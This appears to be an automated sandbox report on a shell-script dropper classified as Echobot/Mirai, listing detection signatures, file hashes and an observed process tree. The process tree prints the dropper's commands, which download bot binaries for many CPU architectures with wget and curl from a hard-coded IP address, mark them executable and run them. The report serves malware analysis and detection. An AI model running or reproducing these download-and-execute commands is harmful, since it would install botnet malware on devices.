Overview

overview

10

Static

static

1

c6cb56d51a...c5c.sh

ubuntu-18.04-amd64

10

c6cb56d51a...c5c.sh

debian-9-armhf

10

c6cb56d51a...c5c.sh

debian-9-mips

10

c6cb56d51a...c5c.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240611-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    28-10-2024 03:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh

  • Size

    1KB

  • MD5

    a40d8e1695f7f86ab08feb9465a4d69e

  • SHA1

    48ce62e5415710d5b8d7f9d120842010f259909d

  • SHA256

    c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c

  • SHA512

    09e74caae29b43281aaca4e7a9a64667a85040184249c9cb9b9903109f8ec06782cbf7861129f905f895d8cc1516dab6969c2d9a174478c509b2d707e355268f

Score
10/10
echobotmiraibotnetdefense_evasiondiscoverytrojan

Malware Config

Signatures

  • Detected Echobot 3 IoCs
  • Echobot

    An updated variant of Mirai which infects a wide range of IoT devices to form a botnet.

    botnettrojanechobot
  • Echobot family
    echobot
  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • Contacts a large (224572) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 16 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

    discovery
  • Changes its process name 8 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

    discovery
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 4 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 21 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    /tmp/c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh
    1⤵
    • Writes file to tmp directory
    PID:704
    • /usr/bin/wget
      wget http://5.59.248.145/bins/jade.x86
      2⤵
      • Writes file to tmp directory
      PID:706
    • /usr/bin/curl
      curl -O http://5.59.248.145/bins/jade.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:725
    • /bin/cat
      cat jade.x86
      2⤵
        PID:733
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
        2⤵
        • File and Directory Permissions Modification
        PID:734
      • /tmp/cp
        ./cp x86
        2⤵
        • Executes dropped EXE
        PID:736
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:739
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:740
      • /bin/cat
        cat jade.mips
        2⤵
        • System Network Configuration Discovery
        PID:741
      • /bin/chmod
        chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
        2⤵
        • File and Directory Permissions Modification
        PID:742
      • /tmp/cp
        ./cp mips
        2⤵
        • Executes dropped EXE
        • System Network Configuration Discovery
        PID:743
      • /usr/bin/wget
        wget http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:745
      • /usr/bin/curl
        curl -O http://5.59.248.145/bins/jade.mpsl
        2⤵
        • Writes file to tmp directory
        PID:746
      • /bin/cat
        cat jade.mpsl
        2⤵
          PID:747
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:748
        • /tmp/cp
          ./cp mpsl
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:749
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm
          2⤵
          • Writes file to tmp directory
          PID:753
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm
          2⤵
          • Writes file to tmp directory
          PID:760
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:768
        • /tmp/cp
          ./cp arm
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:769
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm5
          2⤵
          • Writes file to tmp directory
          PID:817
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm5
          2⤵
          • Writes file to tmp directory
          PID:824
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.mips jade.mpsl jade.x86 systemd-private-4cb956a2fd91447da6e1b309a5742ec8-systemd-timedated.service-lUv4XY
          2⤵
          • File and Directory Permissions Modification
          PID:830
        • /tmp/cp
          ./cp arm5
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:831
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm6
          2⤵
          • Writes file to tmp directory
          PID:864
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm6
          2⤵
          • Writes file to tmp directory
          PID:871
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.mips jade.mpsl jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:873
        • /tmp/cp
          ./cp arm6
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:874
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.arm7
          2⤵
          • Writes file to tmp directory
          PID:878
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.arm7
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:885
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:887
        • /tmp/cp
          ./cp arm7
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:888
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.ppc
          2⤵
          • Writes file to tmp directory
          PID:892
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.ppc
          2⤵
          • Writes file to tmp directory
          PID:899
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.mips jade.mpsl jade.ppc jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:901
        • /tmp/cp
          ./cp ppc
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:902
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.m68k
          2⤵
          • Writes file to tmp directory
          PID:906
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.m68k
          2⤵
          • Writes file to tmp directory
          PID:913
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:915
        • /tmp/cp
          ./cp m68k
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:916
        • /usr/bin/wget
          wget http://5.59.248.145/bins/jade.sh4
          2⤵
          • Writes file to tmp directory
          PID:920
        • /usr/bin/curl
          curl -O http://5.59.248.145/bins/jade.sh4
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:927
        • /bin/chmod
          chmod +x c6cb56d51aba1af677044ab90e6aad83b851e6acd33640d25097e746dec41c5c.sh cp jade.arm jade.arm5 jade.arm6 jade.arm7 jade.m68k jade.mips jade.mpsl jade.ppc jade.sh4 jade.x86
          2⤵
          • File and Directory Permissions Modification
          PID:929
        • /tmp/cp
          ./cp sh4
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Enumerates active TCP sockets
          • Changes its process name
          • Reads system network configuration
          • Reads runtime system information
          PID:930

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/cp
        Filesize

        95KB

        MD5

        5059c698bfa13806cb55d8aa9e6b9b95

        SHA1

        15b9be86d584a4dc8dda5362652ede9a3394ed7c

        SHA256

        da981a689f7e31471175bb11492fd8d68cdef6c62c0bfba2e2abb920766841c6

        SHA512

        4c2ece09c98aa200ff3ea2df0da176f39d20cb76a3604503c6d1b2a977fdb611cb8647c5485558db63f63d4e10c634ad464aa9337d378eab6aecb9546ee45929

        Download Submit

      • /tmp/cp
        Filesize

        99KB

        MD5

        6d9c0a62ac0f74aa31e3b29e8ed657db

        SHA1

        ee08239789e1d5920cdac5dfa64e4ec4a867b393

        SHA256

        f166d6c0baffa303bf8e2e08d11966062a7d0024cfd57212f3ad7b069fad66b5

        SHA512

        fbb875076cc6b11a623973898ad59e4f01316ba0f86b273edb39639eb9ea3daf0bc061fe1ebd1d0d7111ae1ed2f68ec780ed64f230d1436cecbea6f2525501c2

        Download Submit

      • /tmp/jade.x86
        Filesize

        68KB

        MD5

        9dae832b43230cdf6f41aeeb8aff1a30

        SHA1

        f399b7f5c4a08298d0a199ee27ab96a546f23c2e

        SHA256

        337f54805daa4730a201e251146a89820eb23aaa4604f681781c016b12c91c21

        SHA512

        ba90eb1d666d12933870c43acfb511ded11ce1c2105c2fda617865584713f31e323480e9c1e4cdbb6bdb5d694ed82b177e522a0e81c8486c90e1c1e9e54e521b

        Download Submit